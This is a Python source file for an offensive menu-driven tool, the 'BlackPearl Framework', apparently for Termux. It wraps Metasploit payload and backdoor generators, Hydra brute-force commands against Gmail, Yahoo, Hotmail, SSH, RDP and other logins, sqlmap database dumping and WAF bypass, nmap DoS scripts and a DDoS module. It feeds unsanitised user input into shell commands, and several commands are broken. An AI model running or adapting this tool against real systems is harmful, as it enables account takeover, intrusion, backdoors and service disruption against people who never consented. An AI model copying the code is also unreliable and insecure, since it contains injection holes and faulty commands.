#!/bin/env python
import os,sys
import time
import random
from urllib.request import urlopen
F = '\033[91m'
G = '\033[92m'
os.system("run")
def sprint(s):
        for c in s +'\n':
                sys.stdout.write(c)
                sys.stdout.flush()
                time.sleep(0.1  / 100)
ban1 =  """\x1b[36m                                                                   
   @@@@@@@@@@@@@@@                                          @@@@@@@@@@@@@@@@@@@ 
    %@@@@@@@@@  /@@@@@@    (@@@@@@@@@@@@@@@@@@@@@@@,    @@@@@@@.     @@@@@@@@%  
        ,@@@@@@@@     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@       @@@@@@@        
        @@@@@@@@@@@@      @@@@@@@@@@@@@@@@@@@@@@@@@@@@#       @@@@@@@@@,        
          @@@@@@@@@@@@       #@@@@@@@@@@@@@@@@@@@@@@      /@@@@@@@@@@           
           @@@@@@@@@@@@@@       @@@@@@@@@@@@@@@@@/    @@        @@@@@@@         
         @@@        @@@@@,  &     @@@@@@@@@@@@@@      @@@@           %@@@       
       @@            ,@     @@&    @@@@@@@@@@@   @     @@(         @@@@@.@@     
     @@             @@@,  @@.   @   ,@/    @      @(,  @@@@         @@@@@@@@@   
    @   /@@         @ @   @ @  @       @&     %( @,,  .*@@@           @@@@@  @  
   @@@@@@.           @ @@    @@@ @  @@@@@@  @ @@@    @ @@%             @@@@@.   
  @@@@@@           &@@@(  @@@#     @.@@@@%@      @@@  @&@@@        &@@@ @@@@@   
   @@@@                   @       @@@  @@@@       @@@@@@            @@@@@@@@@&  
   @@@ @.                  .@   &  @@  @@@# .   @@@@@@@*         @@ .@@@@@@@@@  
  @@@@@@/                  @@@.@@@  @, @@@ @@@@@@@@@             @@@@@@@@@@  @  
  @@@@@@@ #          @@.      @.     @ @@       ,     @@      @% @@@@@@@@@@     
   # @@@@@@@  @         @@@@          &@%         @@@        @@@@@@@@@@@@@@     
      @@@@@@@ @@@@#     , @@@@@               @@@@       %@,,@@@@@@@@@@@@@      
       @@@@@@@&@@@@@@@    @@@@@@@@         @@@@@ @@    @@@@@@@@@@@@@@ @@@.      
        (@@ @@@@@@@@@@@@@.  @@@@@@@@@@@@@@@@@@@@@    @@@@@@@@@ @@@@@  @@        
              @@@@@@@@@@@@@@. @@@@@@@@@@@@@@@@%  .@@@@@@@@@    @@@    (         
                @@@, @@@@@@@@@@,@@@@@@@@@@@@  @@@@@(.@@@       @                
                   @(   @@@@ @@@@@@@@@@@@@%@@@@@@  @@                           
                           @@   @@@@@@@@@@@@@@,                                 
                                  @@@@@@@@@@                                                                                                             
 ________ ______                   *@@@@                  
/_  __/ // / __/                                      
 / / / _  / _/                                        
/_/_/_//_/___/__  _______ _____  _______   ___  __    
  / _ )/ /  / _ |/ ___/ //_/ _ \/ __/ _ | / _ \/ /    
 / _  / /__/ __ / /__/ ,< / ___/ _// __ |/ , _/ /__   
/____/____/_/_|_\___/_/|_/_/__/___/_/_|_/_/|_/____/ __
  / __/ _ \/ _ | /  |/  / __/ | /| / / __ \/ _ \/ //_/
 / _// , _/ __ |/ /|_/ / _/ | |/ |/ / /_/ / , _/ ,<   
/_/ /_/|_/_/ |_/_/  /_/___/ |__/|__/\____/_/|_/_/|_|"""

banner = """
  \x1b[36m+~~~~~[\x1b[00m THE BLACKPEARL FRAMEWOKR \x1b[36m]~~~~~~\x1b[36m+
  \x1b[36m+~~~~~[\x1b[00m MSF NMAP DDOS WORDLISTER HYDRA SQLMAP INFO\x1b[36m]~~~~~~\x1b[36m+""" 

ban2 = """\x1b[91m
██████╗ ██████╗       ███████╗
██╔══██╗██╔══██╗      ██╔════╝
██████╔╝██████╔╝█████╗█████╗  
██╔══██╗██╔═══╝ ╚════╝██╔══╝  
██████╔╝██║           ██║     
╚═════╝ ╚═╝           ╚═╝"""                             

ban3 = """\x1b[36m
╔╦╗╦ ╦╔═╗
 ║ ╠═╣║╣ 
 ╩ ╩ ╩╚═╝
╔╗ ╦  ╔═╗╔═╗╦╔═╔═╗╔═╗╔═╗╦═╗╦  
╠╩╗║  ╠═╣║  ╠╩╗╠═╝║╣ ╠═╣╠╦╝║  
╚═╝╩═╝╩ ╩╚═╝╩ ╩╩  ╚═╝╩ ╩╩╚═╩═╝
╔═╗╦═╗╔═╗╔╦╗╔═╗╦ ╦╔═╗╦═╗╦╔═
╠╣ ╠╦╝╠═╣║║║║╣ ║║║║ ║╠╦╝╠╩╗
╚  ╩╚═╩ ╩╩ ╩╚═╝╚╩╝╚═╝╩╚═╩ ╩"""

ban4 = """x1b[91m
 /                         
                                                      @@@@.                     
                                                      @@&@@@#                   
                                                      @@@@@@@@&                 
                                                      *@&@@@&@,*#               
                                                       @@@@@*....&              
            Hack without getting anger....             .@@@,......*/            
                                                        ,@*........*/           
                                                         ,(.........,*          
                                                          ,(.........(.         
                                                            &.........&         
                                                             &,.......(.        
                                                  *%@@&####%@@@#*,.....#        
          *@@@@@&@..............*%@&.       @#.......................,@@        
        ,@@@@@@@&@@.....................,(&/............................(*      
(......,/#&%/,(@@@@@&.....................................................@     
/,...............,/%&%#%&#/,,..............................................@    
,*........................(&(.     &***,......,,......................*&...,(   
 /...............................#@%**,......./@@&@*.............../@* &@#..&   
 %................................,#.........(@@/ .@@,..............,@@@@@,.%   
 &................................,#.........,@@@@@@%..........*@@&..,@@@%...@  
 %,...................,,***********%........,((/(#/.......................*%((%*
 **..........,,********************@.....##(((((((&..............*.......,&((((%
  #...,,***************************&....(((((((((((@...........#...#......@((((%
  %/*******************************/*...,%((((((((#/........,,.......%.....%#(#*
                         .,*(@******@...../&((((%%..........................,@  
                          .@********%.....................................#/    
                        &(**********#,.................................(%       
                      &***********/#/,........#(****(#&#,...........&*...#*     
                    .&**********&.  %.....................*@*****(%%/*,....*#   
                       %/******(/   @........................*&/.............@  
                         ,%******(*,#@*........................,#............/, 
                            @******&///#,........................@...........@  
                           @%#****(*..............................&***,,,,,%,   
                        @%######&*%............*****,,..........#(,*///@.       
                         @####%# %..............,******,...............,*       
                           @####%%.............BLACKPEARL..............#.      
                             @##@((&.....................FRAMEWORK.......%      
                               &@#((%,....................................%     
                               /,..........................................*,   
                               ./...........................................&   
                                %,,................,,,*********,,,.........,&   
                                 /(****************************************&    
                                   (#*************/(#%&&&&&%#(/*********&*      
                                (&,,*******%(*(*             @***********,,@,   
                             */&,@/....****#@*     V.1      *@%**,...(&*%@"""  
			
 
		                                          


ban5 = """x1b[91m
                                 P___----....
                                ! __
                      ' ~~ ---.#..__ `  ~  ~    -  -  .   .:
                       `             ~~--.               .F~~___-__.
                       ;                   ,       .- . _!
                      ,                     '       ;      ~ .
                     ,        ____           ;      ' _ ._    ;
                    ,_ . - '___#,  ~~~ ---. _,   . '  .#'  ~ .;
                  =---==~~~    ~~~==--__     ; '~ -. ,#_     .'
                   '                     `~=.;           `  /
                                             '  '          '.
                    '                         '
            \                                  ' '            '
            `.`\    '                          . ;             ,
              \  `  '                            '             ;
               ;   '                           '               '
             /_ .,                           /   __...---./   '
             ',_,   __.--- ~~;#~ --..__    _'.-~;#     //  `.'
             / / ~~ .' .     #;         ~~  /// #;   //   /
           /    ' . __ .  ' ;#;_ .        ////.;#;./ ;  /
           \ .        /    ,##' /   _   /. '(/    ~||~\'
            \  ` - . /_ . -==-  ~ '   / (/ '     . ;;. ',
           /' .       ' -^^^...--- ``(/'    _  '   '' `,;
##,. .#...(       '   .c  c .c  c  c.    '..      ;; ../
%%#%;,..##.\_                           ,;###;,. ;;.:##;,.    
%%%%########%%%%;,.....,;%%%%%%;,.....,;%%%%%%%%%%%%%%%%%%%%............ 
╔╗ ╦  ╔═╗╔═╗╦╔═
╠╩╗║  ╠═╣║  ╠╩╗
╚═╝╩═╝╩ ╩╚═╝╩ ╩
╔═╗╔═╗╔═╗╦═╗╦  
╠═╝║╣ ╠═╣╠╦╝║  
╩  ╚═╝╩ ╩╩╚═╩═╝
╔═╗╦═╗╔═╗╔╦╗╔═╗╦ ╦╔═╗╦═╗╦╔═
╠╣ ╠╦╝╠═╣║║║║╣ ║║║║ ║╠╦╝╠╩╗
╚  ╩╚═╩ ╩╩ ╩╚═╝╚╩╝╚═╝╩╚═╩ ╩
(*)MSF (*)NMAP (*)HYDRA (*)DDOS (*)WORDLISTER (*)SQLMAP (*) INFO"""

ban6 = """\x1b[32m

                   < Hacking is an art and we are artists >
                                                                                
   .@  /                                                                (  /@   
    .. ,@@@@/               THE BLACKPEARL-FRAMEWORK                @@@@%# ..   
     * #* &@@@@@@                                               @@@@@%,.#  &    
       # @@@@*/@@@@@@                                      .@@@@@@.&@@@&.       
    ( &%.#,&@@@@  #@@@@@             FROM            ,@@@@@. (@@@&*#/*@ ..   
    ,  /#@@@#%@.& (/%@@@%                              .@@@@@*/*.#&&#@@@.% .*   
     ,&@*##&@@.(*(.&@@&@,                               *@@@&%* % #@@,&.#@.#    
    @@(/*@@@%%/, %.(@@#/                                ,(&&& (/ (.%@@@&#.#@,   
      /%@#/.#,/ /&*@&((/        THE FRATERNITY           %*(@@*,#.% %*,@@,#     
    # .#%,@@#.*(&#@(,,&,                                 &, ,&@#*,( @@%/(/ @.   
    ,, ((@@*/,*.( @**%@/       %@.             /@(       @(#,#% @./ #/@@,/.,    
     .*&@*#,&  (**%.,(&@,       @*@,#@/*(/(@/##,&       %@..,#.%// .%/*#@/#     
     #(/,((@&. /,%#@/.(&@@(      @.#@(,/@#(@#&,#      @@@*/.%%&/*/ /@@,#,/#.    
       # &@@@. ,(&@/(@.#/%@@@@@@ @(&%@(,%*&/*%%&/@@@@@@*%(.%((@%/  /@@@**,      
         , //*&@*,,/%%/ @%*(%@@@. **%(,&@((.@(#(,@@@*//&% #%(***(@#,(..,        
           /,%@@@##&&/.@@,( &@*@#&%/#@@* @@&#*@*.@,@. #,@(,(@&##@@@*(.          
             .//@##(&(.,%(*(%# *%..@@@,(@,.@@#,(@# @/#/## /@#(#&#(/             
                ,((*//## .##.%**%@./@#,  .(&@*,@*(*% &/  @(*,*#/                
                  /#,./%@@@&*.#*%@@%,@#*./%( @@#@,# @@@@@#,.((,                 
                     (@, *@@@@&  (@@@//@@@ @@@%(, @@@@%  &@,                    
                        .@# %@@%( (,@@%,(,@@&,% &&@@# &@                        
                               .,&@*&@@((@@@%#@*/                               
                           * &@(,.@#,,% /.@#/(#(.@@/.#                          
                        /*&@.,,&@%(*.. ,( .,*,.@@,( #@ @                        
                          & %@@ #(@//.(./.(./*@ (,@@ ,,                         
                         .&  ,./@(( @@ * /(@&  @@.#   @                         
                           %.,@@ % @@@ * # %@( .#@@ (                           
                           .@.  @ %@@  . ( @@@. #  (&                           
                                 &   ,.@.%#    @ """                               
                                                                                

			  
def randomlogo():
        listlogo = [ban1,ban2,ban3,ban4,ban5,ban6]
        logo=(random.choice(listlogo))
        sprint(logo)

def msf():
	print("1.Install Metasploit Framework")
	print("2.Metasploit Framework version")
	print("3.Windows > payload.exe (payload and listener) ")
	print("4.Android > payload.apk(Payload and listener)") 
	print("5.Linux >  payload.py(payload and listener)")
	print("6.MacOS > payload.jar(payload and listener)")
	print("7.Web > payload.php(payload and listener)")
	print("8.Simple TCP shell for PHP")
	print("9.Simple TCP shell for WAR")
	print("10.Simple TCP shell for ASP")
	print("11.Simple TCP shell for javascript")
	print("12.Trojan or backdoor for windows xp/7")
	print("13.Harvest email using metasploit framework")
	i = input("[msf>")
	if i == '1':
		print("Installing Metasploit Framework")
		time.sleep(2)
		os.system("pkg install metasploit")
	elif i == '2':
		print("5.0.0 / January 10, 2019")
	elif i == '3':
		os.system("cd  ~/Blackpearl-framework/module;python windows.py")
	elif i == '4':
		os.system("cd  ~/Blackpearl-framework/module;python android.py")
	elif i == '5':
		os.system("cd  ~/Blackpearl-framework/module;python python.py")
	elif i == '6':
		os.system("cd  ~/Blackpearl-framework/module;python jar.py")
	elif i == '7':
		os.system("cd  ~/Blackpearl-framework/module;python  php.py")
	elif i == '8':
		os.system("cd  ~/Blackpearl-framework/module;python tp.py")
	elif i == '9':
		os.system("cd  ~/Blackpearl-framework/module;python war.py")
	elif i == '10':
		os.system("cd  ~/Blackpearl-framework/module;python sp.py")
	elif i == '11':
		os.system("cd  ~/Blackpearl-framework/module;python jsp.py")
	elif i == '12':
		os.system("cd  ~/Blackpearl-framework/module;python trojan.py")
	elif i == '13':
		os.system("cd  ~/Blackpearl-framework/module;python email.py")
	elif i == 'back':
		main()
	elif i == 'help':
	    print("This for exploiting a system")
	else:
	    print("[!] Invalid input")
	    main()

def nmap():
	print()
	print("1.Scan a website to find open ports")
	print("2.Scan for open port only")
	print("3.Scan a subnet")
	print("4.Scan a range of ports")
	print("5.Scan 100 most common ports")
	print("6.Scan all 65535 ports")
	print("7.Scan using TCP connect")
	print("8.Scan using TCP SYN")
	print("9.Scan UFO ports")
	print("10.Detect OS & Service")
	print("11.Standard service detecting")
	print("12.Detect more aggressive services")
	print("13.Light Banner Grabbing Detection")
	print("14.Scan using default safe scripts")
	print("15.Scan using a specific NSE script")
	print("16.Scan with a set of scripts")
	print("17.Scan for DDOS reflectors")
	print("18.Gather page titles from HTTP services")
	print("19.HEARTBLEED testing")
	print("20.Perform a RPC scan")
	print("21.Scan IP with a given range")
	print("22.Check firewall")
	print("23.Scan a specified port")
	print("24.Scan specified ports")
	print("25.Check vulnerabiliity")
	print()
	i = input("[nmap> ")
	if i == '1':
		j = input("Enter Site/IP : ")
		os.system("nmap" + j)
		nmap()
	elif i == '2':
		j = input("Enter Site/IP : ")
		os.system("nmap -open " + j)
		nmap()
	elif i == '3':
		j = input("Enter Site/IP : ")
		os.system("nmap" + j + '/24')
		nmap()
	elif i == '5':
		j = input("Enter Site/IP : ")
		os.system("nmap -F " + j)
		nmap()
	elif i == '4':
		j = input("Enter Site/IP : ")
		os.system("nmap -p 1-100" + j)
		nmap()
	elif i == '6':
		j = input("Enter Site/IP : ")
		os.system("nmap -p- " + j)
		nmap()
	elif i == '7':
		j = input("Enter Site/IP : ")
		os.system("nmap -sT " + j)
		nmap()
	elif i == '8':
		j = input("Enter Site/IP : ")
		os.system("nmap -sS " + j)
		nmap()
	elif i == '9':
		j = input("Enter Site/IP : ")
		os.system("nmap -sU -p 123,161,162 " + j)
		nmap()
	elif i == '10':
		j = input("Enter Site/IP : ")
		os.system("nmap -A " + j)
		nmap()
	elif i == '11':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV " + j)
		nmap()
	elif i == '12':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV " + j)
		nmap()
	elif i == '13':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV --version-intensity 0 " + j)
		nmap()
	elif i == '14':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV -sC " + j)
		nmap()
	elif i == '15':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV -p 443 –script=ssl-heartbleed.nse " + j)
		nmap()
	elif i == '16':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV --script=smb*  " + j)
		nmap()
	elif i == '17':
		j = input("Enter Site/IP : ")
		os.system("nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr " + j + '/24')
		nmap()
	elif i == '18':
		j = input("Enter Site/IP : ")
		os.system("nmap --script=http-title " + j)
		nmap()
	elif i == '19':
		j = input("Enter Site/IP : ")
		os.system("nmap -sV -p 443 --script=ssl-heartbleed " + j +'/24')
		nmap()
	elif i == '20':
		j = input("Enter Site/IP : ")
		os.system("nmap -sR " + j)
		nmap()
	elif i == '21':
		r = input("Enter range : ")
		j = input("Enter Site/IP : ")
		os.system("nmap " + j + '-' + r)
		nmap()
	elif i == '22':
		j = input("Enter Site/IP : ")
		os.system("nmap -PN " + j)
		nmap()
	elif i == '23':
		p = input("Enter Port : ")
		j = input("Enter Site/IP : ")
		os.system("nmap -p " + j + p)
		nmap()
	elif i == '24':
		p = input("Enter Port1 : ")
		q = input("Enter Port2 : ")
		j = input("Enter Site/IP : ")
		os.system("nmap -p " + j + ',' + q + j)
		nmap()
	elif i == '25':
		j = input("Enter Site/IP : ")
		os.system("nmap --script dos -Pn " + j)
		nmap()
	elif i == 'back':
		main()
	elif i == 'help':
		print(" \n This is an automater for port scanning ,vulnerability scanning,finding sys info ,etc. \n back - To go back to pearl console ")
		nmap()
	else:
		print("[!] Invalid input")
		print("[!] Try again")
		nmap()

			  
def hydra():
     print("1.Dowload Hydra")
     print("2.Cisco bruteforce")
     print("3.FTP bruteforce")
     print("4.Gmail bruteforce")
     print("5.SSH bruteforce")
     print("6.Telnet bruteforce")
     print("7.Yahoo mail bruteforce")
     print("8.Hotmail bruteforce")
     print("9.Router speedy bruteforce")
     print("10.RDP bruteforce")
     print("11.MySql bruteforce")
     print("12.Teamspeak bruteforce")
     print()
     i = input("[Hydra~>")
     if i == 'hydra':
     	os.system("clear")
     	print("Installing Hydra")
     	os.system("pkg install hydra")
     elif i == 'cisco':
     	w = input("Enter IP : ")
     	j = input("Wordlist : ")
     	os.system("hydra -P %s %s cisco" % (j, w))
     	hydra()
     elif i == 'ftp':
     	os.system("clear")
     	u = input("User : ")
     	w = input("Enter IP : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s %s ftp" % (u, j, w))
     	hydra()
     elif i == 'vnc':
     	os.system("clear")
     	w = input("Enter IP : ")
     	j = input("Wordlist : ")
     	os.system("hydra -P %s -e n -t 1 %s vnc -V" % (j, w))
     	hydra()
     elif i == 'gmail':
     	os.system("clear")
     	e = input("Email : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (e, j))
     	hydra()
     elif i == 'ssh':
     	os.system("clear")
     	u = input("User : ")
     	w = input("Enter IP : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s %s ssh" % (u,j, w))
     	hydra()
     elif i == 'telnet':
     	os.system("clear")
     	u = input("User : ")
     	w = input("Enter IP : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s %s telnet" % (u, j, w))
     	hydra()
     elif i == 'yahoo':
     	os.system("clear")
     	e = input("Email : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (e, j))
     	hydra()
     elif i == 'hotmail':
     	os.system("clear")
     	e = input("Email : ")
     	j = input("Wordlist : ")
     	os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (e, j))
     	hydra()
     elif i == 'router':
     	os.system("clear")
     	u = input("User : ")
     	e = input("Email : ")
     	j = input("Wordlist : ")
     	os.system("hydra -m / -l %s -P %s %s http-get" % (u, j, e))
     	hydra()
     elif i == 'rdp':
     	os.system("clear")
     	u = input("User :")
     	e = input("Email :")
     	j = input("Wordlist :")
     	os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (u, j, i))
     	hydra()
     elif i == 'mysql':
     	os.system("clear")
     	u = input("User :")
     	i = input("Enter IP : ")
     	j = input("'Wordlist :")
     	os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (u, j, i))
     	hydra()
     elif i == 'teamspeak':
        u = input("User :")
        i = input("IP :")
        j = input("Wordlist :")
        os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (u, j, i))
        hydra()
     elif i == 'help':
        os.system("clear")
        print("\n TYPE THIS COMMANDS  : \n hydra - To install hydra \n cisco - Cisco bruteforce \n ftp - FTP bruteforce \n vnc - vnc bruteforce \n gmail - Gmail bruteforce \n yahoo - Yahoo bruteforce \n telnet - Telnet bruteforce \n teamspeak - Teamspek bruteforce \n mysql - MySql bruteforce \n rdp - RDP briteforce \n router - Router bruteforce \n hotmail - Hotmail bruteforce \n help - For help \n clear - Clearing terminal \n  back - To go back to pearl console")
        hydra()
     elif i == 'clear':
     	os.system("clear")
     	hydra()
     elif i == 'back':
     	main()
     else:
     	print("[!] Invalid input")
     	print("[!] Try again")
     	print()
     	hydra()
		
def sql():
	 print("1.Download Sqlmap")
	 print("2.Scan a website to find sql vuln")
	 print("3.Get database")
	 print("4.Get tables of one db")
	 print("5.Get columns of a table")
	 print("6.Get data from  table")
	 print("7.WAF bypass")
	 print()
	 j = input("[sql>")
	 if j == '1':
	 	os.system("cd /data/data/com.termux/files/home && git clone https://github.com/sqlmapproject/sqlmap.git")
	 	print("Sqlmap Successfully Installed")
	 	sql()
	 elif j == '2':
	 	os.system("cd ~/Blackpearl-framework/module;python scan.py")
	 	sql()
	 elif j == '3':
	 	os.system("cd ~/Blackpearl-framework/module;python db.py")
	 elif j == '4':
	 	os.system("cd ~/Blackpearl-framework/module;python table.py")
	 	sql()
	 elif j == '5':
	 	os.system("cd ~/Blackpearl-framework/module;python column.py")
	 	sql()
	 elif j == '6':
	 	os.system("cd ~/Blackpearl-framework/module;python dump.py")
	 	sql()
	 elif j == '7':
	 	os.system("cd ~/Blackpearl-framework/module;python waf.py")
	 	sql()
	 elif j == 'help':
	 	 os.system("\n This is an automater for exploiting a website with sql vuln using sqlmap. \n back - To go back pearl console \n ")
	 	 sql()
	 elif j == 'back':
	 	 main() 
	
def info():
	print()
	print("1.Geo Ip lookup")
	print("2.Host finder")
	print("3.HTTP finder")
	print("4.Host DNS finder")
	print("5.Reverse IP looker")
	print("6.Traceroute")
	i = input("[info~> ")
	if i == '1':
		d = input('Enter IP Address : ')
		g = "http://api.hackertarget.com/geoip/?q=" + d
		ip = urlopen(g).read()
		print(ip)
		info()
	elif i == '2':
		d = input('Enter Domain : ')
		h = "http://api.hackertarget.com/hostsearch/?q=" + d
		f = urlopen(h).read()
		print(f)
		info()
	elif i == '3':
		d = input("Enter Domain : ")
		h = "http://api.hackertarget.com/httpheaders/?q=" + d
		der =  urlopen(h).read()
		print(der)
		info()
	elif i == '4':
		d = input("Enter Domain : ")
		get = "https://api.hackertarget.com/mtr/?q=" + d
		page = urlopen(get).read()
		print(page)
		info()
	elif i == '5':
	     d = input("Enter IP : ")
	     reverse = "http://api.hackertarget.com/reverseiplookup/?q=" + d
	     lookup = url.open(reverse).read()
	     print(lookup)
	     info()
	elif i == '6':
	     d = input("Enter Domain : ")
	     host = "http://api.hackertarget.com/findshareddns/?q=" + d
	     dns = urlopen(host).read()
	     print(dns)
	     info()
	elif i == 'back':
	    main()
	elif i == 'exit':
	    sys.exit(1)
	elif i == 'help':
	    print("\n Select corresponding number to given option here. use command back to go back to pearl console. \n This is for information gathering. \n exit - To exit from console \n")
	else:
		print("[!] Invalid input")
		print("Try again")
		info()			
def mainmenu():
	randomlogo()
	sprint(banner)
	main()
	
def main():
  	 i = input("[pearl~>")
  	 if i == 'msf':
  	 	print("Opening Metasploit Automater")
  	 	msf()
  	 elif i == 'nmap':
  	 	print("Opening Network Mapper Automater")
  	 	time.sleep(2)
  	 	nmap()
  	 elif i == 'hydra':
  	 	print("Opening Hydra Automater")
  	 	hydra()
  	 elif i == 'wl':
  	 	print("Opening Wordlist Automater")
  	 	time.sleep(2)
  	 	os.system("cd /data/data/com.termux/files/home/Blackpearl-framework/module;bash wl.sh")
  	 elif i == 'ddos':
  	 	print("Opening DDOS Automater")
  	 	time.sleep(2)
  	 	os.system("cd /data/data/com.termux/files/home/Blackpearl-framework/module;python2 Ddos.py")
  	 elif i == 'help':
  	 	print("Opening Metasploit Automater")
  	 elif i == 'exit':
 	  	sys.exit(1)
  	 elif i == 'about':
  	 	os.system("cd /data/data/com.termux/files/home/Blackpearl-framework/module;python about.py")
  	 elif i == 'clear':
  	 	os.system("clear")
  	 elif i == 'update':
  	 	os.system("cd /data/data/com.termux/files/home/Blackpearl-framework/module;python update.py")
  	 elif i == 'sql':
  	 	print("Opening Sqlmap Automater")
  	 	sql()
  	 elif i == 'info':
  	 	info()
  	 else:
  	 	print("[!] Invalid Inputs")
  	 	sys.exit(2)
  	 	
mainmenu()	
